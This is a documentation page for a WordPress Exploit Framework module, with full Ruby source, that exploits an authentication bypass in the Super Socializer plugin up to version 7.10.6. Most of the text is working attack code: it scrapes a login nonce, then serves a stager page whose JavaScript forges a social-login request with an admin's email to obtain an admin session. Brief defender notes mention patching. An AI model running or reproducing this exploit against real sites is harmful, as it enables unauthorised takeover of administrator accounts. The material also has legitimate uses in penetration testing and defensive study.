Class: Wpxf::Auxiliary::SuperSocializerAuthBypass
- Includes:
- Wpxf, Net::HttpServer
- Defined in:
- lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
-
#login_nonce ⇒ Object
Returns the value of attribute login_nonce.
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #check ⇒ Object
- #fetch_nonce ⇒ Object
-
#initialize ⇒ SuperSocializerAuthBypass
constructor
A new instance of SuperSocializerAuthBypass.
- #on_http_request ⇒ Object
- #run ⇒ Object
- #stager ⇒ Object
Methods included from Net::HttpServer
#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ SuperSocializerAuthBypass
Returns a new instance of SuperSocializerAuthBypass.
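# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 7
# Registers the module's metadata and its single required option.
#
# The rendered page dropped the method name in front of the option list,
# leaving a bare `([ StringOption.new(...) ])` after +update_info+; it is
# restored here as +register_options+, the Options API method this module
# lists among its included methods.
def initialize
  super

  update_info(
    name: 'Super Socializer <= 7.10.6 Authentication Bypass',
    desc: %(
      Super Socializer <= 7.10.6 is vulnerable to an authentication bypass
      exploit if an attacker is in posession of an admin's e-mail address
      and the social login feature is enabled. This module will launch a
      HTTP server, which when visited will automate the bypass process,
      and provide an admin session.
    ),
    author: [
      'rastating' # WPXF module
    ],
    references: [
      ['WPVDB', '9043']
    ],
    date: 'Mar 03 2018'
  )

  # `admin_email` is required because the stager sends it verbatim as the
  # `profileData[email]` field of the social-login request.
  register_options([
    StringOption.new(
      name: 'admin_email',
      desc: 'The e-mail address of the admin user to authenticate as',
      required: true
    )
  ])
end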
Instance Attribute Details
#login_nonce ⇒ Object
Returns the value of attribute login_nonce.
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 153
# Nonce scraped from the WordPress login page by +fetch_nonce+ and embedded in
# the stager as the `security` request parameter.
#
# NOTE(review): line 153 of the source is presumably an `attr_accessor` —
# YARD renders only the reader here, but +fetch_nonce+ assigns through
# `self.login_nonce=`, so a writer exists as well.
def login_nonce
  @login_nonce
end
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 40
# Vulnerability check based on the version advertised in the plugin readme.
#
# Delegates to +check_plugin_version_from_readme+ with the plugin slug and
# 7.10.7, which — matching the `<= 7.10.6` in the module name — is presumably
# the first fixed release.
#
# @return whatever +check_plugin_version_from_readme+ returns
def check
  plugin_slug = 'super-socializer'
  first_fixed_version = '7.10.7'
  check_plugin_version_from_readme(plugin_slug, first_fixed_version)
end
#fetch_nonce ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 122
# Retrieves the plugin's social-login AJAX nonce from the WordPress login page.
#
# The login page embeds a `the_champ_sl_ajax_token` JavaScript object; its
# `security` member is the nonce the stager later sends to admin-ajax.
#
# @return [Boolean] true when a nonce was found and stored in +login_nonce+;
#   false when the login page could not be fetched (no response or a
#   non-200 status) or the token object was not present in the body
def fetch_nonce
  emit_info 'Fetching a login nonce...'

  response = execute_get_request(url: wordpress_url_login)
  return false unless response&.code == 200

  # Only the `security` value is captured; `ajax_url` is matched loosely so
  # the site's own URL does not affect extraction.
  token_pattern = /var\sthe_champ_sl_ajax_token\s=\s{"ajax_url":".+?","security":"([a-z0-9]+?)"};/i
  self.login_nonce = response.body[token_pattern, 1]

  unless login_nonce
    emit_error 'Failed to fetch a login nonce'
    return false
  end

  emit_success "Found nonce: #{login_nonce}", true
  true
end
#on_http_request ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 114
# HTTP server callback. The request arguments are discarded, so every request
# the module's server receives is answered with the stager page.
#
# @return [Hash] +:type+ (content type) and +:body+ (the HTML from +stager+)
def on_http_request(*)
  content_type = 'text/html'
  emit_info 'Serving stager...'

  { type: content_type, body: stager }
end
#run ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 139
# Module entry point: runs the base-class checks, fetches the nonce, prints
# the address to visit and starts the HTTP server that serves the stager.
#
# @return [Boolean] false when the base-class +run+ or +fetch_nonce+ fails;
#   true once the HTTP server has been started
def run
  return false unless super && fetch_nonce

  bind_address = http_server_bind_address
  # A wildcard bind address is not something a browser can be pointed at,
  # so the printed URL uses a loopback name instead.
  display_host = bind_address == '0.0.0.0' ? 'localhost' : bind_address

  emit_info "Visit http://#{display_host}:#{http_server_bind_port} to login."
  emit_warning 'If your browser blocks the popup, be sure to allow it.'

  start_http_server
  true
end
#stager ⇒ Object
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 44
# Builds the HTML page served by +on_http_request+.
#
# The inline script runs on DOMContentLoaded and posts the plugin's
# `the_champ_user_auth` AJAX action to admin-ajax.php from a popup window,
# carrying the nonce from +fetch_nonce+ as `security`, the configured
# `admin_email` as `profileData[email]`, random filler for the other
# `profileData[...]` fields, `provider: 'facebook'` and this server's URL as
# `redirectionUrl`. Two seconds later it closes the popup and sends the
# browser to wp-admin, where the session the module description refers to
# is expected to be usable.
#
# NOTE(review): `admin_email` (and the other interpolated values) go into
# single-quoted JavaScript literals unescaped, so a quote or backslash in
# the option breaks the script rather than being submitted.
#
# Defender notes: per the module description the precondition is an enabled
# social-login feature on a version <= 7.10.6, and +check+ treats 7.10.7 as
# the fixed release; updating the plugin, or disabling social login where
# it is not used, removes the condition. admin-ajax requests for this
# action are also worth logging.
#
# @return [String] the stager HTML
def stager
  %(
    <html>
      <head>
      </head>
      <body>
        <script>
          var url = '#{full_uri}',
              email = '#{datastore['admin_email']}',
              nonce = '#{login_nonce}';

          function exploit() {
            var param = {
              action: 'the_champ_user_auth',
              security: nonce,
              'profileData[id]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
              'profileData[link]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
              'profileData[name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
              'profileData[email]': email,
              'profileData[first_name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
              'profileData[last_name]': '#{Wpxf::Utility::Text.rand_alpha(6)}',
              provider: 'facebook',
              redirectionUrl: encodeURI(url)
            };

            var wnd = OpenWindowWithPost("#{wordpress_url_admin_ajax}", "width=700,height=345,left=100,top=100,resizable=yes,scrollbars=yes", "exploit", param);

            setTimeout(function() {
              wnd.close();
              window.location.replace("#{wordpress_url_admin}");
            }, 2000);
          }

          function OpenWindowWithPost(url, windowoption, name, params) {
            var form = document.createElement("form");
            form.setAttribute("method", "post");
            form.setAttribute("action", url);
            form.setAttribute("target", name);

            for (var i in params) {
              if (params.hasOwnProperty(i)) {
                var input = document.createElement('input');
                input.type = 'hidden';
                input.name = i;
                input.value = params[i];
                form.appendChild(input);
              }
            }

            document.body.appendChild(form);
            var wnd = window.open("", name, windowoption);
            form.submit();
            document.body.removeChild(form);
            return wnd;
          }

          document.addEventListener("DOMContentLoaded", function(event) {
            exploit();
          })
        </script>
      </body>
    </html>
  )
end